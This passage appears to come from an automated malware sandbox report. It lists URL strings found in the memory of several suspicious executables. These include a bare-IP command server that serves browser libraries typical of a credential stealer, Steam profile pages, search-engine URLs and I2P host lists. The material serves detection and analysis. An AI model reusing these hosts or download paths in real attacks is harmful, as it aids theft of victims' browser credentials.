Source: BFCAAEHJDB.exe, 00000007.00000003.2859028722.00000000044A4000.00000004.00000020.00020000.00000000.sdmp, BFCAAEHJDB.exe, 00000007.00000003.2850857977.00000000044A2000.00000004.00000020.00020000.00000000.sdmp, euasv89vr56qz5toefmgc1.exe, 0000000E.00000000.2871865920.00007FF67096E000.00000008.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.3440296730.000001E398B72000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr	String found in binary or memory: http://rus.i2p/hosts.txt
Source: main.exe, 00000017.00000002.3441085501.000001E398F9D000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr, KXEmxT2p.23.dr	String found in binary or memory: http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txt
Source: main.exe, 00000017.00000002.3441085501.000001E398F9D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txtxyz/
Source: BFCAAEHJDB.exe, 00000007.00000003.2859028722.00000000044A4000.00000004.00000020.00020000.00000000.sdmp, BFCAAEHJDB.exe, 00000007.00000003.2850857977.00000000044A2000.00000004.00000020.00020000.00000000.sdmp, euasv89vr56qz5toefmgc1.exe, 0000000E.00000000.2871865920.00007FF67096E000.00000008.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.3440296730.000001E398B72000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr	String found in binary or memory: http://stats.i2p/cgi-bin/newhosts.txt
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: Amcache.hve.13.dr	String found in binary or memory: http://upx.sf.net
Source: file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502822954.000000001B566000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2771309518.0000000023AAE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502799257.000000001B564000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2773812386.0000000029A18000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2395414511.000000001B56D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: file.exe, file.exe, 00000000.00000002.2788158189.000000006C85D000.00000002.00000001.01000000.00000008.sdmp, file.exe, 00000000.00000002.2773812386.0000000029A18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: file.exe, 00000000.00000002.2768266325.000000001B807000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2767527727.00000000191FD000.00000002.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: file.exe, 00000000.00000003.2228501229.0000000002522000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2761033099.0000000000607000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://5.75.212.60
Source: file.exe, 00000000.00000003.2269115043.00000000024FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502799257.000000001B564000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2361797117.000000001B53B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2395488232.000000001B541000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2395414511.000000001B564000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2373150785.000000001B560000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2373328753.000000001B536000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2373854371.000000001B562000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2374176714.000000001B564000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/
Source: file.exe, 00000000.00000003.2373328753.000000001B536000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/#
Source: file.exe, 00000000.00000003.2395488232.000000001B541000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2373328753.000000001B536000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60//
Source: file.exe, 00000000.00000003.2269115043.00000000024FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60//S
Source: file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/0
Source: file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/2
Source: file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/4
Source: file.exe, 00000000.00000003.2502799257.000000001B564000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/5
Source: file.exe, 00000000.00000003.2502799257.000000001B564000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/5.212.60/
Source: file.exe, 00000000.00000003.2502799257.000000001B564000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/5.212.60/nss3.dll
Source: file.exe, 00000000.00000003.2361797117.000000001B53B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/6
Source: file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/;
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/A
Source: file.exe, 00000000.00000003.2269115043.00000000024FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502799257.000000001B564000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/B_F
Source: file.exe, 00000000.00000003.2373150785.000000001B560000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2373854371.000000001B562000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/EGIDHDHIDG
Source: file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/H
Source: file.exe, 00000000.00000003.2502799257.000000001B564000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2395414511.000000001B564000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2373150785.000000001B560000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2373854371.000000001B562000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2374176714.000000001B564000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/ata
Source: file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/e
Source: file.exe, 00000000.00000003.2395488232.000000001B541000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2768054750.000000001B536000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/freebl3.dll
Source: file.exe, 00000000.00000003.2395488232.000000001B541000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/freebl3.dllE
Source: file.exe, 00000000.00000003.2395488232.000000001B541000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2768054750.000000001B536000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/freebl3.dllh
Source: file.exe, 00000000.00000003.2395488232.000000001B541000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/freebl3.dlls
Source: file.exe, 00000000.00000003.2269115043.00000000024FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/licies
Source: file.exe, 00000000.00000002.2768054750.000000001B536000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/mozglue.dll
Source: file.exe, 00000000.00000002.2768054750.000000001B536000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/mozglue.dlls
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/msvcp140.dll
Source: file.exe, 00000000.00000002.2768054750.000000001B536000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/nss3.dll
Source: file.exe, 00000000.00000002.2768054750.000000001B536000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/nss3.dlle
Source: file.exe, 00000000.00000003.2269115043.00000000024FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/ows
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/softokn3.dll
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/softokn3.dllnXq
Source: file.exe, 00000000.00000002.2761033099.000000000052A000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2762253914.00000000024F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/sqls.dll
Source: file.exe, 00000000.00000002.2768054750.000000001B4F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/vcruntime140.dll
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/vcruntime140.dll;
Source: file.exe, 00000000.00000002.2761033099.0000000000607000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://5.75.212.60art/form-data;
Source: file.exe, 00000000.00000003.2362409222.000000001B585000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000003.2228501229.000000000252E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.steampowered.com/
Source: file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: BFCAAEHJDB.exe, 00000007.00000003.2859028722.000000000437F000.00000004.00000020.00020000.00000000.sdmp, BFCAAEHJDB.exe, 00000007.00000003.2850857977.000000000437D000.00000004.00000020.00020000.00000000.sdmp, euasv89vr56qz5toefmgc1.exe, 0000000E.00000000.2871865920.00007FF67096E000.00000008.00000001.01000000.0000000C.sdmp, main.exe, main.exe, 00000017.00000002.3442752199.00007FFD940A4000.00000002.00000001.01000000.00000011.sdmp, main.exe, 00000017.00000002.3440296730.000001E398B72000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.3441085501.000001E398F9D000.00000004.00000020.00020000.00000000.sdmp, KXEmxT2p.23.dr	String found in binary or memory: https://banana.incognet.io/
Source: file.exe, 00000000.00000002.2767835795.0000000019760000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2768175135.000000001B55F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2722820114.000000001B55F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
Source: file.exe, 00000000.00000002.2767835795.0000000019760000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2768175135.000000001B55F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2722820114.000000001B55F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
Source: file.exe, 00000000.00000003.2228501229.000000000252E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: file.exe, 00000000.00000003.2228501229.000000000252E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/
Source: file.exe, 00000000.00000003.2362409222.000000001B585000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.2362409222.000000001B585000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.2362409222.000000001B585000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000003.2228501229.000000000252E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://checkout.steampowered.com/
Source: file.exe, 00000000.00000003.2228501229.000000000252E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/
Source: file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=eZOyL2UG5OX8&a
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
Source: file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
Source: file.exe, 00000000.00000003.2228501229.0000000002522000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269115043.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269115043.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=3eYWCMu_
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269115043.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=e0OV
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=B7Vsdo1okyaC&l=english
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
Source: file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=Iy1ies1ROjUT&l=english
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=54OKIvHlOQzF&l=e
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
Source: file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=_D2Bg4UEaFxK&l=en
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
Source: file.exe, 00000000.00000003.2228501229.0000000002522000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: file.exe, 00000000.00000003.2228501229.0000000002522000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: file.exe, 00000000.00000003.2228501229.0000000002522000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: file.exe, 00000000.00000003.2228501229.0000000002522000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
Source: file.exe, 00000000.00000002.2767835795.0000000019760000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2768175135.000000001B55F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2722820114.000000001B55F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
Source: file.exe, 00000000.00000002.2767835795.0000000019760000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2768175135.000000001B55F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2722820114.000000001B55F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: file.exe, 00000000.00000003.2362409222.000000001B585000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.2362409222.000000001B585000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.2362409222.000000001B585000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: file.exe, 00000000.00000003.2228501229.000000000252E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/
Source: file.exe, 00000000.00000003.2228501229.0000000002522000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://help.steampowered.com/en/
